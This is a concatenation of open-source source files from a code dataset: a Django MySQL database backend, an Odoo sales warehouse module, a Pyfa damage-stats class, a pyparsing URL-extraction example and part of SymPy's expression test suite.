test_file = os.path.join(test_dir, 'keyword-%s-as-identifier.rs' % kw)
# set write permission if file exists, so it can be changed
if os.path.exists(test_file):
os.chmod(test_file, stat.S_IWUSR)
with open(test_file, 'wt') as f:
f.write(template % (datetime.datetime.now().year, kw, kw))
# mark file read-only
os.chmod(test_file, stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH)
| apache-2.0 |
hungtt57/matchmaker | lib/python2.7/site-packages/django/db/backends/mysql/base.py | 103 | 15969 | """
MySQL database backend for Django.
Requires mysqlclient: https://pypi.python.org/pypi/mysqlclient/
MySQLdb is supported for Python 2 only: http://sourceforge.net/projects/mysql-python
"""
from __future__ import unicode_literals
import datetime
import re
import sys
import warnings
from django.conf import settings
from django.db import utils
from django.db.backends import utils as backend_utils
from django.db.backends.base.base import BaseDatabaseWrapper
from django.utils import six, timezone
from django.utils.encoding import force_str
from django.utils.functional import cached_property
from django.utils.safestring import SafeBytes, SafeText
try:
import MySQLdb as Database
except ImportError as e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading MySQLdb module: %s" % e)
from MySQLdb.constants import CLIENT, FIELD_TYPE # isort:skip
from MySQLdb.converters import Thing2Literal, conversions # isort:skip
# Some of these import MySQLdb, so import them after checking if it's installed.
from .client import DatabaseClient # isort:skip
from .creation import DatabaseCreation # isort:skip
from .features import DatabaseFeatures # isort:skip
from .introspection import DatabaseIntrospection # isort:skip
from .operations import DatabaseOperations # isort:skip
from .schema import DatabaseSchemaEditor # isort:skip
from .validation import DatabaseValidation # isort:skip
# We want version (1, 2, 1, 'final', 2) or later. We can't just use
# lexicographic ordering in this check because then (1, 2, 1, 'gamma')
# inadvertently passes the version test.
version = Database.version_info
if (version < (1, 2, 1) or (version[:3] == (1, 2, 1) and
(len(version) < 5 or version[3] != 'final' or version[4] < 2))):
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("MySQLdb-1.2.1p2 or newer is required; you have %s" % Database.__version__)
DatabaseError = Database.DatabaseError
IntegrityError = Database.IntegrityError
# It's impossible to import datetime_or_None directly from MySQLdb.times
parse_datetime = conversions[FIELD_TYPE.DATETIME]
def parse_datetime_with_timezone_support(value):
dt = parse_datetime(value)
# Confirm that dt is naive before overwriting its tzinfo.
if dt is not None and settings.USE_TZ and timezone.is_naive(dt):
dt = dt.replace(tzinfo=timezone.utc)
return dt
def adapt_datetime_with_timezone_support(value, conv):
# Equivalent to DateTimeField.get_db_prep_value. Used only by raw SQL.
if settings.USE_TZ:
if timezone.is_naive(value):
warnings.warn("MySQL received a naive datetime (%s)"
" while time zone support is active." % value,
RuntimeWarning)
default_timezone = timezone.get_default_timezone()
value = timezone.make_aware(value, default_timezone)
value = value.astimezone(timezone.utc).replace(tzinfo=None)
return Thing2Literal(value.strftime("%Y-%m-%d %H:%M:%S.%f"), conv)
# MySQLdb-1.2.1 returns TIME columns as timedelta -- they are more like
# timedelta in terms of actual behavior as they are signed and include days --
# and Django expects time, so we still need to override that. We also need to
# add special handling for SafeText and SafeBytes as MySQLdb's type
# checking is too tight to catch those (see Django ticket #6052).
# Finally, MySQLdb always returns naive datetime objects. However, when
# timezone support is active, Django expects timezone-aware datetime objects.
django_conversions = conversions.copy()
django_conversions.update({
FIELD_TYPE.TIME: backend_utils.typecast_time,
FIELD_TYPE.DECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.NEWDECIMAL: backend_utils.typecast_decimal,
FIELD_TYPE.DATETIME: parse_datetime_with_timezone_support,
datetime.datetime: adapt_datetime_with_timezone_support,
})
# This should match the numerical portion of the version numbers (we can treat
# versions like 5.0.24 and 5.0.24a as the same). Based on the list of version
# at http://dev.mysql.com/doc/refman/4.1/en/news.html and
# http://dev.mysql.com/doc/refman/5.0/en/news.html .
server_version_re = re.compile(r'(\d{1,2})\.(\d{1,2})\.(\d{1,2})')
# MySQLdb-1.2.1 and newer automatically makes use of SHOW WARNINGS on
# MySQL-4.1 and newer, so the MysqlDebugWrapper is unnecessary. Since the
# point is to raise Warnings as exceptions, this can be done with the Python
# warning module, and this is setup when the connection is created, and the
# standard backend_utils.CursorDebugWrapper can be used. Also, using sql_mode
# TRADITIONAL will automatically cause most warnings to be treated as errors.
class CursorWrapper(object):
"""
A thin wrapper around MySQLdb's normal cursor class so that we can catch
particular exception instances and reraise them with the right types.
Implemented as a wrapper, rather than a subclass, so that we aren't stuck
to the particular underlying representation returned by Connection.cursor().
"""
codes_for_integrityerror = (1048,)
def __init__(self, cursor):
self.cursor = cursor
def execute(self, query, args=None):
try:
# args is None means no string interpolation
return self.cursor.execute(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def executemany(self, query, args):
try:
return self.cursor.executemany(query, args)
except Database.OperationalError as e:
# Map some error codes to IntegrityError, since they seem to be
# misclassified and Django would prefer the more logical place.
if e.args[0] in self.codes_for_integrityerror:
six.reraise(utils.IntegrityError, utils.IntegrityError(*tuple(e.args)), sys.exc_info()[2])
raise
def __getattr__(self, attr):
if attr in self.__dict__:
return self.__dict__[attr]
else:
return getattr(self.cursor, attr)
def __iter__(self):
return iter(self.cursor)
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
# Ticket #17671 - Close instead of passing thru to avoid backend
# specific behavior.
self.close()
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'mysql'
# This dictionary maps Field objects to their associated MySQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
_data_types = {
'AutoField': 'integer AUTO_INCREMENT',
'BinaryField': 'longblob',
'BooleanField': 'bool',
'CharField': 'varchar(%(max_length)s)',
'CommaSeparatedIntegerField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'datetime',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'bigint',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'char(15)',
'GenericIPAddressField': 'char(39)',
'NullBooleanField': 'bool',
'OneToOneField': 'integer',
'PositiveIntegerField': 'integer UNSIGNED',
'PositiveSmallIntegerField': 'smallint UNSIGNED',
'SlugField': 'varchar(%(max_length)s)',
'SmallIntegerField': 'smallint',
'TextField': 'longtext',
'TimeField': 'time',
'UUIDField': 'char(32)',
}
@cached_property
def data_types(self):
if self.features.supports_microsecond_precision:
return dict(self._data_types, DateTimeField='datetime(6)', TimeField='time(6)')
else:
return self._data_types
operators = {
'exact': '= %s',
'iexact': 'LIKE %s',
'contains': 'LIKE BINARY %s',
'icontains': 'LIKE %s',
'regex': 'REGEXP BINARY %s',
'iregex': 'REGEXP %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE BINARY %s',
'endswith': 'LIKE BINARY %s',
'istartswith': 'LIKE %s',
'iendswith': 'LIKE %s',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, '\\', '\\\\'), '%%', '\%%'), '_', '\_')"
pattern_ops = {
'contains': "LIKE BINARY CONCAT('%%', {}, '%%')",
'icontains': "LIKE CONCAT('%%', {}, '%%')",
'startswith': "LIKE BINARY CONCAT({}, '%%')",
'istartswith': "LIKE CONCAT({}, '%%')",
'endswith': "LIKE BINARY CONCAT('%%', {})",
'iendswith': "LIKE CONCAT('%%', {})",
}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.features = DatabaseFeatures(self)
self.ops = DatabaseOperations(self)
self.client = DatabaseClient(self)
self.creation = DatabaseCreation(self)
self.introspection = DatabaseIntrospection(self)
self.validation = DatabaseValidation(self)
def get_connection_params(self):
kwargs = {
'conv': django_conversions,
'charset': 'utf8',
}
if six.PY2:
kwargs['use_unicode'] = True
settings_dict = self.settings_dict
if settings_dict['USER']:
kwargs['user'] = settings_dict['USER']
if settings_dict['NAME']:
kwargs['db'] = settings_dict['NAME']
if settings_dict['PASSWORD']:
kwargs['passwd'] = force_str(settings_dict['PASSWORD'])
if settings_dict['HOST'].startswith('/'):
kwargs['unix_socket'] = settings_dict['HOST']
elif settings_dict['HOST']:
kwargs['host'] = settings_dict['HOST']
if settings_dict['PORT']:
kwargs['port'] = int(settings_dict['PORT'])
# We need the number of potentially affected rows after an
# "UPDATE", not the number of changed rows.
kwargs['client_flag'] = CLIENT.FOUND_ROWS
kwargs.update(settings_dict['OPTIONS'])
return kwargs
def get_new_connection(self, conn_params):
conn = Database.connect(**conn_params)
conn.encoders[SafeText] = conn.encoders[six.text_type]
conn.encoders[SafeBytes] = conn.encoders[bytes]
return conn
def init_connection_state(self):
with self.cursor() as cursor:
# SQL_AUTO_IS_NULL in MySQL controls whether an AUTO_INCREMENT column
# on a recently-inserted row will return when the field is tested for
# NULL. Disabling this value brings this aspect of MySQL in line with
# SQL standards.
cursor.execute('SET SQL_AUTO_IS_NULL = 0')
def create_cursor(self):
cursor = self.connection.cursor()
return CursorWrapper(cursor)
def _rollback(self):
try:
BaseDatabaseWrapper._rollback(self)
except Database.NotSupportedError:
pass
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit(autocommit)
def disable_constraint_checking(self):
"""
Disables foreign key checks, primarily for use in adding rows with forward references. Always returns True,
to indicate constraint checks need to be re-enabled.
"""
self.cursor().execute('SET foreign_key_checks=0')
return True
def enable_constraint_checking(self):
"""
Re-enable foreign key checks after they have been disabled.
"""
# Override needs_rollback in case constraint_checks_disabled is
# nested inside transaction.atomic.
self.needs_rollback, needs_rollback = False, self.needs_rollback
try:
self.cursor().execute('SET foreign_key_checks=1')
finally:
self.needs_rollback = needs_rollback
def check_constraints(self, table_names=None):
"""
Checks each table name in `table_names` for rows with invalid foreign
key references. This method is intended to be used in conjunction with
`disable_constraint_checking()` and `enable_constraint_checking()`, to
determine if rows with invalid references were entered while constraint
checks were off.
Raises an IntegrityError on the first invalid foreign key reference
encountered (if any) and provides detailed information about the
invalid reference in the error message.
Backends can override this method if they can more directly apply
constraint checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE")
"""
cursor = self.cursor()
if table_names is None:
table_names = self.introspection.table_names(cursor)
for table_name in table_names:
primary_key_column_name = self.introspection.get_primary_key_column(cursor, table_name)
if not primary_key_column_name:
continue
key_columns = self.introspection.get_key_columns(cursor, table_name)
for column_name, referenced_table_name, referenced_column_name in key_columns:
cursor.execute("""
SELECT REFERRING.`%s`, REFERRING.`%s` FROM `%s` as REFERRING
LEFT JOIN `%s` as REFERRED
ON (REFERRING.`%s` = REFERRED.`%s`)
WHERE REFERRING.`%s` IS NOT NULL AND REFERRED.`%s` IS NULL"""
% (primary_key_column_name, column_name, table_name, referenced_table_name,
column_name, referenced_column_name, column_name, referenced_column_name))
for bad_row in cursor.fetchall():
raise utils.IntegrityError("The row in table '%s' with primary key '%s' has an invalid "
"foreign key: %s.%s contains a value '%s' that does not have a corresponding value in %s.%s."
% (table_name, bad_row[0],
table_name, column_name, bad_row[1],
referenced_table_name, referenced_column_name))
def is_usable(self):
try:
self.connection.ping()
except Database.Error:
return False
else:
return True
@cached_property
def mysql_version(self):
with self.temporary_connection():
server_info = self.connection.get_server_info()
match = server_version_re.match(server_info)
if not match:
raise Exception('Unable to determine MySQL version from version string %r' % server_info)
return tuple(int(x) for x in match.groups())
| mit |
anas-taji/sale-workflow | sale_sourced_by_line/model/sale.py | 33 | 2963 | # -*- coding: utf-8 -*-
#
#
# Author: Guewen Baconnier, Yannick Vaucher
# Copyright 2013-2015 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp import models, api, fields
from openerp.osv import orm
class SaleOrder(models.Model):
_inherit = 'sale.order'
def _prepare_order_line_procurement(self, cr, uid, order, line,
group_id=False, context=None):
values = super(SaleOrder, self)._prepare_order_line_procurement(
cr, uid, order, line, group_id=group_id, context=context)
if line.warehouse_id:
values['warehouse_id'] = line.warehouse_id.id
return values
@api.model
def _prepare_procurement_group_by_line(self, line):
vals = super(SaleOrder, self)._prepare_procurement_group_by_line(line)
# for compatibility with sale_quotation_sourcing
if line._get_procurement_group_key()[0] == 8:
if line.warehouse_id:
vals['name'] += '/' + line.warehouse_id.name
return vals
SO_STATES = {
'cancel': [('readonly', True)],
'progress': [('readonly', True)],
'manual': [('readonly', True)],
'shipping_except': [('readonly', True)],
'invoice_except': [('readonly', True)],
'done': [('readonly', True)],
}
warehouse_id = fields.Many2one(
'stock.warehouse',
'Default Warehouse',
states=SO_STATES,
help="If no source warehouse is selected on line, "
"this warehouse is used as default. ")
class SaleOrderLine(orm.Model):
_inherit = 'sale.order.line'
warehouse_id = fields.Many2one(
'stock.warehouse',
'Source Warehouse',
help="If a source warehouse is selected, "
"it will be used to define the route. "
"Otherwise, it will get the warehouse of "
"the sale order")
@api.multi
def _get_procurement_group_key(self):
""" Return a key with priority to be used to regroup lines in multiple
procurement groups
"""
priority = 8
key = super(SaleOrderLine, self)._get_procurement_group_key()
# Check priority
if key[0] >= priority:
return key
return (priority, self.warehouse_id.id)
| agpl-3.0 |
blitzmann/Pyfa | eos/utils/stats.py | 1 | 2381 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
class DmgTypes:
"""Container for damage data stats."""
def __init__(self, em, thermal, kinetic, explosive):
self.em = em
self.thermal = thermal
self.kinetic = kinetic
self.explosive = explosive
self._calcTotal()
# Iterator is needed to support tuple-style unpacking
def __iter__(self):
yield self.em
yield self.thermal
yield self.kinetic
yield self.explosive
yield self.total
def __eq__(self, other):
if not isinstance(other, DmgTypes):
return NotImplemented
return all((
self.em == other.em,
self.thermal == other.thermal,
self.kinetic == other.kinetic,
self.explosive == other.explosive,
self.total == other.total))
def __bool__(self):
return any((
self.em, self.thermal, self.kinetic,
self.explosive, self.total))
def _calcTotal(self):
self.total = self.em + self.thermal + self.kinetic + self.explosive
def __add__(self, other):
return type(self)(
em=self.em + other.em,
thermal=self.thermal + other.thermal,
kinetic=self.kinetic + other.kinetic,
explosive=self.explosive + other.explosive)
def __iadd__(self, other):
self.em += other.em
self.thermal += other.thermal
self.kinetic += other.kinetic
self.explosive += other.explosive
self._calcTotal()
return self
| gpl-3.0 |
chrisdew/pyparsing-autocomplete | examples/urlExtractor.py | 16 | 1749 | # URL extractor
# Copyright 2004, Paul McGuire
from pyparsing import Literal,Suppress,CharsNotIn,CaselessLiteral,\
Word,dblQuotedString,alphanums,SkipTo
import urllib
import pprint
# Define the pyparsing grammar for a URL, that is:
# URLlink ::= <a href= URL>linkText</a>
# URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link. Note also
# that it is not necessary to explicitly show this in the pyparsing grammar; by default,
# pyparsing skips over whitespace between tokens.
linkOpenTag = (Literal("<") + "a" + "href" + "=").suppress() + \
( dblQuotedString | Word(alphanums+"/") ) + \
Suppress(">")
linkCloseTag = Literal("<") + "/" + CaselessLiteral("a") + ">"
link = linkOpenTag + SkipTo(linkCloseTag) + linkCloseTag.suppress()
# Go get some HTML with some links in it.
serverListPage = urllib.urlopen( "http://www.yahoo.com" )
htmlText = serverListPage.read()
serverListPage.close()
# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks,strt,end in link.scanString(htmlText):
print toks.asList()
# Rerun scanString, but this time create a dict of text:URL key-value pairs.
# Need to reverse the tokens returned by link, using a parse action.
link.setParseAction( lambda st,loc,toks: [ toks[1], toks[0] ] )
# Create dictionary from list comprehension, assembled from each pair of tokens returned
# from a matched URL.
pprint.pprint(
dict( [ toks for toks,strt,end in link.scanString(htmlText) ] )
)
| mit |
lidavidm/sympy | sympy/core/tests/test_expr.py | 3 | 54640 | from __future__ import division
from sympy import (Add, Basic, S, Symbol, Wild, Float, Integer, Rational, I,
sin, cos, tan, exp, log, nan, oo, sqrt, symbols, Integral, sympify,
WildFunction, Poly, Function, Derivative, Number, pi, NumberSymbol, zoo,
Piecewise, Mul, Pow, nsimplify, ratsimp, trigsimp, radsimp, powsimp,
simplify, together, collect, factorial, apart, combsimp, factor, refine,
cancel, Tuple, default_sort_key, DiracDelta, gamma, Dummy, Sum, E,
exp_polar, Lambda, expand, diff, O)
from sympy.core.function import AppliedUndef
from sympy.physics.secondquant import FockState
from sympy.physics.units import meter
from sympy.core.compatibility import xrange
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, n, t, u, x, y, z
class DummyNumber(object):
"""
Minimal implementation of a number that works with SymPy.
If one has a Number class (e.g. Sage Integer, or some other custom class)
that one wants to work well with SymPy, one has to implement at least the
methods of this class DummyNumber, resp. its subclasses I5 and F1_1.
Basically, one just needs to implement either __int__() or __float__() and
then one needs to make sure that the class works with Python integers and
with itself.
"""
def __radd__(self, a):
if isinstance(a, (int, float)):
return a + self.number
return NotImplemented
def __truediv__(a, b):
return a.__div__(b)
def __rtruediv__(a, b):
return a.__rdiv__(b)
def __add__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number + a
return NotImplemented
def __rsub__(self, a):
if isinstance(a, (int, float)):
return a - self.number
return NotImplemented
def __sub__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number - a
return NotImplemented
def __rmul__(self, a):
if isinstance(a, (int, float)):
return a * self.number
return NotImplemented
def __mul__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number * a
return NotImplemented
def __rdiv__(self, a):
if isinstance(a, (int, float)):
return a / self.number
return NotImplemented
def __div__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number / a
return NotImplemented
def __rpow__(self, a):
if isinstance(a, (int, float)):
return a ** self.number
return NotImplemented
def __pow__(self, a):
if isinstance(a, (int, float, DummyNumber)):
return self.number ** a
return NotImplemented
def __pos__(self):
return self.number
def __neg__(self):
return - self.number
class I5(DummyNumber):
number = 5
def __int__(self):
return self.number
class F1_1(DummyNumber):
number = 1.1
def __float__(self):
return self.number
i5 = I5()
f1_1 = F1_1()
# basic sympy objects
basic_objs = [
Rational(2),
Float("1.3"),
x,
y,
pow(x, y)*y,
]
# all supported objects
all_objs = basic_objs + [
5,
5.5,
i5,
f1_1
]
def dotest(s):
for x in all_objs:
for y in all_objs:
s(x, y)
return True
def test_basic():
def j(a, b):
x = a
x = +a
x = -a
x = a + b
x = a - b
x = a*b
x = a/b
x = a**b
assert dotest(j)
def test_ibasic():
def s(a, b):
x = a
x += b
x = a
x -= b
x = a
x *= b
x = a
x /= b
assert dotest(s)
def test_relational():
assert (pi < 3) is False
assert (pi <= 3) is False
assert (pi > 3) is True
assert (pi >= 3) is True
assert (-pi < 3) is True
assert (-pi <= 3) is True
assert (-pi > 3) is False
assert (-pi >= 3) is False
assert (x - 2 < x - 3) is False
def test_relational_assumptions():
from sympy import Lt, Gt, Le, Ge
m1 = Symbol("m1", nonnegative=False)
m2 = Symbol("m2", positive=False)
m3 = Symbol("m3", nonpositive=False)
m4 = Symbol("m4", negative=False)
assert (m1 < 0) == Lt(m1, 0)
assert (m2 <= 0) == Le(m2, 0)
assert (m3 > 0) == Gt(m3, 0)
assert (m4 >= 0) == Ge(m4, 0)
m1 = Symbol("m1", nonnegative=False, real=True)
m2 = Symbol("m2", positive=False, real=True)
m3 = Symbol("m3", nonpositive=False, real=True)
m4 = Symbol("m4", negative=False, real=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=True)
m2 = Symbol("m2", nonpositive=True)
m3 = Symbol("m3", positive=True)
m4 = Symbol("m4", nonnegative=True)
assert (m1 < 0) is True
assert (m2 <= 0) is True
assert (m3 > 0) is True
assert (m4 >= 0) is True
m1 = Symbol("m1", negative=False)
m2 = Symbol("m2", nonpositive=False)
m3 = Symbol("m3", positive=False)
m4 = Symbol("m4", nonnegative=False)
assert (m1 < 0) is False
assert (m2 <= 0) is False
assert (m3 > 0) is False
assert (m4 >= 0) is False
def test_relational_noncommutative():
from sympy import Lt, Gt, Le, Ge
A, B = symbols('A,B', commutative=False)
assert (A < B) == Lt(A, B)
assert (A <= B) == Le(A, B)
assert (A > B) == Gt(A, B)
assert (A >= B) == Ge(A, B)
def test_basic_nostr():
for obj in basic_objs:
raises(TypeError, lambda: obj + '1')
raises(TypeError, lambda: obj - '1')
if obj == 2:
assert obj * '1' == '11'
else:
raises(TypeError, lambda: obj * '1')
raises(TypeError, lambda: obj / '1')
raises(TypeError, lambda: obj ** '1')
def test_series_expansion_for_uniform_order():
assert (1/x + y + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + x).series(x, 0, 1) == 1/x + y + O(x)
assert (1/x + 1 + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + 1 + x).series(x, 0, 1) == 1/x + 1 + O(x)
assert (1/x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 0) == 1/x + O(1)
assert (1/x + y + y*x + x).series(x, 0, 1) == 1/x + y + O(x)
def test_leadterm():
assert (3 + 2*x**(log(3)/log(2) - 1)).leadterm(x) == (3, 0)
assert (1/x**2 + 1 + x + x**2).leadterm(x)[1] == -2
assert (1/x + 1 + x + x**2).leadterm(x)[1] == -1
assert (x**2 + 1/x).leadterm(x)[1] == -1
assert (1 + x**2).leadterm(x)[1] == 0
assert (x + 1).leadterm(x)[1] == 0
assert (x + x**2).leadterm(x)[1] == 1
assert (x**2).leadterm(x)[1] == 2
def test_as_leading_term():
assert (3 + 2*x**(log(3)/log(2) - 1)).as_leading_term(x) == 3
assert (1/x**2 + 1 + x + x**2).as_leading_term(x) == 1/x**2
assert (1/x + 1 + x + x**2).as_leading_term(x) == 1/x
assert (x**2 + 1/x).as_leading_term(x) == 1/x
assert (1 + x**2).as_leading_term(x) == 1
assert (x + 1).as_leading_term(x) == 1
assert (x + x**2).as_leading_term(x) == x
assert (x**2).as_leading_term(x) == x**2
assert (x + oo).as_leading_term(x) == oo
def test_leadterm2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).leadterm(x) == \
(sin(1 + sin(1)), 0)
def test_leadterm3():
assert (y + z + x).leadterm(x) == (y + z, 0)
def test_as_leading_term2():
assert (x*cos(1)*cos(1 + sin(1)) + sin(1 + sin(1))).as_leading_term(x) == \
sin(1 + sin(1))
def test_as_leading_term3():
assert (2 + pi + x).as_leading_term(x) == 2 + pi
assert (2*x + pi*x + x**2).as_leading_term(x) == (2 + pi)*x
def test_as_leading_term4():
# see issue 3744
n = Symbol('n', integer=True, positive=True)
r = -n**3/(2*n**2 + 4*n + 2) - n**2/(n**2 + 2*n + 1) + \
n**2/(n + 1) - n/(2*n**2 + 4*n + 2) + n/(n*x + x) + 2*n/(n + 1) - \
1 + 1/(n*x + x) + 1/(n + 1) - 1/x
assert r.as_leading_term(x).cancel() == n/2
def test_as_leading_term_stub():
class foo(Function):
pass
assert foo(1/x).as_leading_term(x) == foo(1/x)
assert foo(1).as_leading_term(x) == foo(1)
raises(NotImplementedError, lambda: foo(x).as_leading_term(x))
def test_atoms():
assert x.atoms() == set([x])
assert (1 + x).atoms() == set([x, S(1)])
assert (1 + 2*cos(x)).atoms(Symbol) == set([x])
assert (1 + 2*cos(x)).atoms(Symbol, Number) == set([S(1), S(2), x])
assert (2*(x**(y**x))).atoms() == set([S(2), x, y])
assert Rational(1, 2).atoms() == set([S.Half])
assert Rational(1, 2).atoms(Symbol) == set([])
assert sin(oo).atoms(oo) == set([oo])
assert Poly(0, x).atoms() == set([S.Zero])
assert Poly(1, x).atoms() == set([S.One])
assert Poly(x, x).atoms() == set([x])
assert Poly(x, x, y).atoms() == set([x])
assert Poly(x + y, x, y).atoms() == set([x, y])
assert Poly(x + y, x, y, z).atoms() == set([x, y])
assert Poly(x + y*t, x, y, z).atoms() == set([t, x, y])
assert (I*pi).atoms(NumberSymbol) == set([pi])
assert (I*pi).atoms(NumberSymbol, I) == \
(I*pi).atoms(I, NumberSymbol) == set([pi, I])
assert exp(exp(x)).atoms(exp) == set([exp(exp(x)), exp(x)])
assert (1 + x*(2 + y) + exp(3 + z)).atoms(Add) == \
set([1 + x*(2 + y) + exp(3 + z), 2 + y, 3 + z])
# issue 3033
f = Function('f')
e = (f(x) + sin(x) + 2)
assert e.atoms(AppliedUndef) == \
set([f(x)])
assert e.atoms(AppliedUndef, Function) == \
set([f(x), sin(x)])
assert e.atoms(Function) == \
set([f(x), sin(x)])
assert e.atoms(AppliedUndef, Number) == \
set([f(x), S(2)])
assert e.atoms(Function, Number) == \
set([S(2), sin(x), f(x)])
def test_is_polynomial():
k = Symbol('k', nonnegative=True, integer=True)
assert Rational(2).is_polynomial(x, y, z) is True
assert (S.Pi).is_polynomial(x, y, z) is True
assert x.is_polynomial(x) is True
assert x.is_polynomial(y) is True
assert (x**2).is_polynomial(x) is True
assert (x**2).is_polynomial(y) is True
assert (x**(-2)).is_polynomial(x) is False
assert (x**(-2)).is_polynomial(y) is True
assert (2**x).is_polynomial(x) is False
assert (2**x).is_polynomial(y) is True
assert (x**k).is_polynomial(x) is False
assert (x**k).is_polynomial(k) is False
assert (x**x).is_polynomial(x) is False
assert (k**k).is_polynomial(k) is False
assert (k**x).is_polynomial(k) is False
assert (x**(-k)).is_polynomial(x) is False
assert ((2*x)**k).is_polynomial(x) is False
assert (x**2 + 3*x - 8).is_polynomial(x) is True
assert (x**2 + 3*x - 8).is_polynomial(y) is True
assert (x**2 + 3*x - 8).is_polynomial() is True
assert sqrt(x).is_polynomial(x) is False
assert (sqrt(x)**3).is_polynomial(x) is False
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(x) is True
assert (x**2 + 3*x*sqrt(y) - 8).is_polynomial(y) is False
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial() is True
assert ((x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial() is False
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(2)).is_polynomial(x, y) is True
assert (
(x**2)*(y**2) + x*(y**2) + y*x + exp(x)).is_polynomial(x, y) is False
def test_is_rational_function():
assert Integer(1).is_rational_function() is True
assert Integer(1).is_rational_function(x) is True
assert Rational(17, 54).is_rational_function() is True
assert Rational(17, 54).is_rational_function(x) is True
assert (12/x).is_rational_function() is True
assert (12/x).is_rational_function(x) is True
assert (x/y).is_rational_function() is True
assert (x/y).is_rational_function(x) is True
assert (x/y).is_rational_function(x, y) is True
assert (x**2 + 1/x/y).is_rational_function() is True
assert (x**2 + 1/x/y).is_rational_function(x) is True
assert (x**2 + 1/x/y).is_rational_function(x, y) is True
assert (sin(y)/x).is_rational_function() is False
assert (sin(y)/x).is_rational_function(y) is False
assert (sin(y)/x).is_rational_function(x) is True
assert (sin(y)/x).is_rational_function(x, y) is False
def test_is_algebraic_expr():
assert sqrt(3).is_algebraic_expr(x) is True
assert sqrt(3).is_algebraic_expr() is True
eq = ((1 + x**2)/(1 - y**2))**(S(1)/3)
assert eq.is_algebraic_expr(x) is True
assert eq.is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(x) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr(y) is True
assert (sqrt(x) + y**(S(2)/3)).is_algebraic_expr() is True
assert (cos(y)/sqrt(x)).is_algebraic_expr() is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x) is True
assert (cos(y)/sqrt(x)).is_algebraic_expr(y) is False
assert (cos(y)/sqrt(x)).is_algebraic_expr(x, y) is False
def test_SAGE1():
#see http://code.google.com/p/sympy/issues/detail?id=247
class MyInt:
def _sympy_(self):
return Integer(5)
m = MyInt()
e = Rational(2)*m
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE2():
class MyInt(object):
def __int__(self):
return 5
assert sympify(MyInt()) == 5
e = Rational(2)*MyInt()
assert e == 10
raises(TypeError, lambda: Rational(2)*MyInt)
def test_SAGE3():
class MySymbol:
def __rmul__(self, other):
return ('mys', other, self)
o = MySymbol()
e = x*o
assert e == ('mys', x, o)
def test_len():
e = x*y
assert len(e.args) == 2
e = x + y + z
assert len(e.args) == 3
def test_doit():
a = Integral(x**2, x)
